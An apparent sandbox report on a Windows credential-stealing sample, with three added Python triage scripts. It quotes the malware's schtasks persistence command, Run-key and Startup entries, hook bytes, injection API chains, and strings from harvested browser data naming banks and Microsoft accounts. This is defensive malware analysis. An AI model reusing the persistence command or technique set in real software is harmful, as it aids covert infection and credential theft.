Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c
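The three persistence mechanisms recorded above (an hourly scheduled task run with the account's highest privilege level, two HKCU Run values and a Startup-folder shortcut) share one naming scheme: a vendor-sounding name with a 32-hex-digit suffix. The script below is an added example, not part of the Joe Sandbox report and not code from the sample. It parses the schtasks command line copied from the lines above, scores the task, and brute-forces the suffixes over short decimal strings: c81e728d9d4c2f636f067f89cc14862c is md5("2") and 45c48cce2e2d7fbdea1afc51c7c6ad26 is md5("9"), which the code checks with hashlib. Reading those digits as build or campaign identifiers is an assumption; the switch handling and the scoring heuristics are the author's.

```python
import hashlib
import re
from itertools import product
from string import digits

# Persistence entries copied from the Boot Survival lines above.
SCHTASKS_CMD = ('schtasks /create /f /RU "user" '
                '/tr "C:\\ProgramData\\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\\MSIUpdaterV2.exe" '
                '/tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST')
RUN_VALUES = ["AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c",
              "AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26"]
STARTUP_LNK = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk"

USER_WRITABLE = ("\\programdata\\", "\\appdata\\")
HEX32 = re.compile(r"_([0-9a-f]{32})\b")


def tokenize(cmdline: str):
    """Split a Windows command line on whitespace, keeping double-quoted arguments intact."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_schtasks(cmdline: str) -> dict:
    """Map each /switch to its argument, or to True for bare flags such as /f and /create."""
    toks = tokenize(cmdline)
    opts = {}
    i = 1  # skip the program name
    while i < len(toks):
        key = toks[i].lower()
        if key.startswith("/") and i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            opts[key] = toks[i + 1]
            i += 2
        else:
            opts[key] = True
            i += 1
    return opts


def hex_suffix(name: str):
    m = HEX32.search(name)
    return m.group(1) if m else None


def resolve_md5(digest: str, max_len: int = 3):
    """Brute-force MD5 over short decimal strings (10 + 100 + 1000 candidates)."""
    for n in range(1, max_len + 1):
        for combo in product(digits, repeat=n):
            candidate = "".join(combo)
            if hashlib.md5(candidate.encode()).hexdigest() == digest:
                return candidate
    return None


def assess_task(opts: dict):
    reasons = []
    target = str(opts.get("/tr", "")).lower()
    if any(p in target for p in USER_WRITABLE):
        reasons.append("binary in user-writable location")
    if str(opts.get("/rl", "")).upper() == "HIGHEST":
        # highest privileges of that account: an elevated token only if the account is an administrator
        reasons.append("/rl HIGHEST")
    if str(opts.get("/sc", "")).upper() in ("MINUTE", "HOURLY", "ONLOGON", "ONSTART"):
        reasons.append(f"re-executes on {opts['/sc']} schedule")
    if opts.get("/f") is True:
        reasons.append("/f overwrites an existing task of the same name")
    digest = hex_suffix(str(opts.get("/tn", "")))
    if digest:
        reasons.append(f"task name carries md5({resolve_md5(digest)!r})")
    return reasons


def triage_persistence():
    task = parse_schtasks(SCHTASKS_CMD)
    rows = [("task", task["/tn"], assess_task(task))]
    for value in RUN_VALUES:
        digest = hex_suffix(value)
        rows.append(("run", value, [f"HKCU Run value, suffix md5({resolve_md5(digest)!r})"]))
    rows.append(("lnk", STARTUP_LNK, ["per-user Startup shortcut"]))
    return rows


if __name__ == "__main__":
    for kind, name, reasons in triage_persistence():
        print(kind, name, "; ".join(reasons), sep=" | ")
```

All three mechanisms live entirely under the user's own hive and profile (HKCU Run, the per-user Startup folder, and a task registered for /RU "user"), so none of them needs administrative rights to install, and a standard-user clean-up can remove all three without elevation.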

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 1630005 value: E9 2B BA 88 75
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 76EBBA30 value: E9 DA 45 77 8A
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 1640008 value: E9 8B 8E 8C 75
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 76F08E90 value: E9 80 71 73 8A
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 3250005 value: E9 8B 4D 82 72
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 75A74D90 value: E9 7A B2 7D 8D
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 3260005 value: E9 EB EB 82 72
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 75A8EBF0 value: E9 1A 14 7D 8D
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 3270005 value: E9 8B 8A BE 72
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 75E58A90 value: E9 7A 75 41 8D
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 3280005 value: E9 2B 02 C0 72
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 75E80230 value: E9 DA FD 3F 8D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07137890 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_07137890
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
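The "Memory written" entries above come in pairs: a five-byte write at a high address (0x75xxxxxx/0x76xxxxxx, consistent with loaded system DLL code; the report does not name the function, so neither does this note) and a write at a low address in private memory, each beginning with opcode E9, the x86 JMP rel32. PID 3580 is file.exe itself (see the Yara match on "Process Memory Space: file.exe PID: 3580" further down), so these are in-process patches. The following is an added example, not part of the Joe Sandbox report: it decodes each displacement and pairs every hook with its trampoline. The hook at 0x76EBBA30 jumps to 0x0163000F, and the trampoline at 0x01630005 jumps back to 0x76EBBA35, five bytes past the hook, so five bytes of the original prologue were relocated; for 0x76F08E90 the resume address is 0x76F08E98, so eight bytes were stolen there. The 0x70000000 split between DLL and private memory is an assumption about this process's layout.

```python
import struct

# "Memory written" entries copied from the report above: (PID, address, bytes).
# PID 3580 is file.exe itself, so these are in-process patches, not writes into a foreign process.
MEMORY_WRITES = [
    (3580, 0x01630005, "E9 2B BA 88 75"),
    (3580, 0x76EBBA30, "E9 DA 45 77 8A"),
    (3580, 0x01640008, "E9 8B 8E 8C 75"),
    (3580, 0x76F08E90, "E9 80 71 73 8A"),
    (3580, 0x03250005, "E9 8B 4D 82 72"),
    (3580, 0x75A74D90, "E9 7A B2 7D 8D"),
    (3580, 0x03260005, "E9 EB EB 82 72"),
    (3580, 0x75A8EBF0, "E9 1A 14 7D 8D"),
    (3580, 0x03270005, "E9 8B 8A BE 72"),
    (3580, 0x75E58A90, "E9 7A 75 41 8D"),
    (3580, 0x03280005, "E9 2B 02 C0 72"),
    (3580, 0x75E80230, "E9 DA FD 3F 8D"),
]

# Assumption: addresses at or above 0x70000000 are patched DLL code (the hooks); the report does
# not name the functions, so this example does not either. Everything below is private memory.
DLL_RANGE_START = 0x70000000


def jmp_target(address: int, raw: str) -> int:
    """Destination of a 5-byte x86 JMP rel32 (opcode E9) written at `address`.
    The 32-bit displacement is signed and relative to the end of the instruction."""
    code = bytes.fromhex(raw.replace(" ", ""))
    if len(code) != 5 or code[0] != 0xE9:
        raise ValueError(f"not a JMP rel32 at {address:#010x}: {raw}")
    (rel32,) = struct.unpack("<i", code[1:])
    return (address + 5 + rel32) & 0xFFFFFFFF


def pair_hooks(writes):
    """Match each hook (JMP planted in DLL code) with the trampoline that jumps back just past
    the bytes the hook overwrote, the classic inline-hook layout:
        DLL function:  JMP handler              (N prologue bytes overwritten)
        trampoline:    <N stolen bytes> ; JMP function+N
    A hook and a trampoline are paired when the handler lives in the same 64 KiB allocation
    as the trampoline and the resume address lands 5..16 bytes into the function."""
    targets = {addr: jmp_target(addr, raw) for _pid, addr, raw in writes}
    hooks = {a: t for a, t in targets.items() if a >= DLL_RANGE_START}
    trampolines = {a: t for a, t in targets.items() if a < DLL_RANGE_START}
    pairs = []
    for hook, handler in sorted(hooks.items()):
        for tramp, resume in trampolines.items():
            stolen = resume - hook
            if 5 <= stolen <= 16 and (handler >> 16) == (tramp >> 16):
                pairs.append({"hook": hook, "handler": handler, "trampoline": tramp,
                              "resume": resume, "stolen": stolen})
    return pairs


if __name__ == "__main__":
    for p in pair_hooks(MEMORY_WRITES):
        print(f"hook {p['hook']:#010x} -> handler {p['handler']:#010x}; "
              f"trampoline {p['trampoline']:#010x} -> resume {p['resume']:#010x} "
              f"({p['stolen']} bytes stolen)")
```

To identify the hooked functions from a live sample, resolve each hook address against the module list of PID 3580 (the export whose address is nearest below it); the report gives only the raw addresses.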

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0712C230 CreateThread,Sleep, call eax 0_2_0712C230
Source: C:\Users\user\Desktop\file.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CBA212 rdtsc 0_2_00CBA212
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 8126
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 676
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 437
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Window / User API: threadDelayed 9995
Source: C:\Users\user\Desktop\file.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\file.exe API coverage: 10.0 %
Source: C:\Users\user\Desktop\file.exe TID: 5576 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5512 Thread sleep time: -882000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5576 Thread sleep time: -8126000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5512 Thread sleep time: -2028000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5576 Thread sleep time: -437000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 6972 Thread sleep count: 9995 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 6972 Thread sleep time: -2248875s >= -30000s
Source: C:\Users\user\Desktop\file.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07142EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_07142EAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0715CCFD FindFirstFileExW, 0_2_0715CCFD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_0710B2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError, 0_2_0710BAC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07166276 VirtualQuery,GetSystemInfo, 0_2_07166276
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 30000
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: formVMware20,11696428655
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,11696428(
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: billing_address_id.comVMware20,11696428(
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000CuijjqDE5gAdZQ0/uE
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696H
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .utiitsl.comVMware20,11696428658
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ccount.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000002.4492597224.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.00000000016F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,116964288
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CT service, encrypted_token FROM token_servicerr global passwords blocklistVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696
Source: file.exe, 00000000.00000003.2052092482.00000000016C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r global passwords blocklistVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000002.4494156670.0000000006694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}i
Source: file.exe, 00000000.00000002.4492597224.0000000001650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: file.exe, 00000000.00000002.4492597224.00000000016C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_80E7E91F
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ebrokers.co.inVMware20,11696428655d
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ra Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: o.inVMware20,11696428655~
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428650
Source: file.exe, 00000000.00000002.4492597224.00000000016B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000002.4494156670.000000000666F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,116
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000002.4494288913.00000000066CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_di
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: comVMware20,11696428655o
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rootpagecomVMware20,11696428655o
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000002.4494156670.0000000006694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}les(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERD
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pageformVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nickname.utiitsl.comVMware20,11696428658
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000002.4494156670.000000000666F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\hcMSmyGUCSEFc2FAKlzc.exe
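Two kinds of "VMware" string are mixed in the list above. The device paths (SCSI\Disk&Ven_VMware&Prod_Virtual_disk and the Hyper-V RAW device name) identify the hypervisor unambiguously. The many strings ending in "VMware20,1" followed by ten digits come from Ok36VMDQZkJbWeb Data.0.dr, a copy of a Chrome Web Data database written by file.exe (the .0.dr suffix marks a file dropped by process 0, file.exe), and from file.exe memory regions holding the same content. Reading "VMware20,1" as the virtual hardware's product name stored in that database, and the digits as a Unix timestamp (1696428655 is 2023-10-04 14:10:55 UTC), is an inference by the editor, not something the report states. The classifier below is an added example, not part of the Joe Sandbox report; the source labels shorten the report's memory-region identifiers, and the regular expressions are the author's.

```python
import re
from datetime import datetime, timezone

# (source, string) pairs copied from the "Binary or memory string" lines above.
MEMORY_STRINGS = [
    ("file.exe memory", "formVMware20,11696428655"),
    ("file.exe memory", ".comVMware20,11696428("),
    ("Ok36VMDQZkJbWeb Data.0.dr", "interactivebrokers.co.inVMware20,11696428655d"),
    ("file.exe memory", r"SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000CuijjqDE5gAdZQ0/uE"),
    ("file.exe memory", "Hyper-V RAW"),
    ("file.exe memory", r"\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"),
    ("Ok36VMDQZkJbWeb Data.0.dr", "secure.bankofamerica.comVMware20,11696428655|UE"),
    ("file.exe memory", r"SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&"),
    ("Ok36VMDQZkJbWeb Data.0.dr", "Canara Transaction PasswordVMware20,11696428655x"),
    ("file.exe memory", r"\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\hcMSmyGUCSEFc2FAKlzc.exe"),
]

# Device identifiers that only a hypervisor produces.
DEVICE_ARTIFACT = re.compile(r"ven_vmware|prod_virtual_disk|hyper-v raw", re.I)
# Product-name string optionally followed by ten digits: "VMware20,1" + "1696428655".
# Assumption: "VMware20,1" is the virtual hardware's product name recorded in the browser
# database the stealer copied, and the digits are a Unix timestamp from the same row.
DB_CARRYOVER = re.compile(r"VMware20,1(\d{10})?")


def classify(string: str):
    """Return (class, timestamp-or-None) for one memory string."""
    if DEVICE_ARTIFACT.search(string):
        return "hypervisor-device-id", None
    m = DB_CARRYOVER.search(string)
    if m:
        ts = m.group(1)
        when = datetime.fromtimestamp(int(ts), tz=timezone.utc).isoformat() if ts else None
        return "browser-db-carryover", when
    return "other", None


def summarize(strings):
    """Count each class per source so the two kinds of 'VMware' hit are not conflated."""
    counts = {}
    for source, s in strings:
        kind, _ = classify(s)
        counts[(source, kind)] = counts.get((source, kind), 0) + 1
    return counts


if __name__ == "__main__":
    for (source, kind), n in sorted(summarize(MEMORY_STRINGS).items()):
        print(f"{source:28} {kind:24} {n}")
```

When scoring a sample's evasion capability, count only the hypervisor-device-id class; the carryover class says something about the harvested data, not about VM checks in the binary.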
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CBA212 rdtsc 0_2_00CBA212
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0713E580 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW, 0_2_0713E580
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BAB380 WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 0_2_00BAB380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710E3B5 GetHGlobalFromStream,GlobalSize,GlobalLock,VirtualAlloc,RtlGetCompressionWorkSpaceSize,RtlCompressBuffer,GlobalUnlock,GdipDisposeImage,GetProcessHeap,HeapAlloc, 0_2_0710E3B5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_071462B6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_071462B6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07146014 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_07146014
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0714FC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0714FC07
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07145D6C cpuid 0_2_07145D6C
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_07160227
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_071602FD
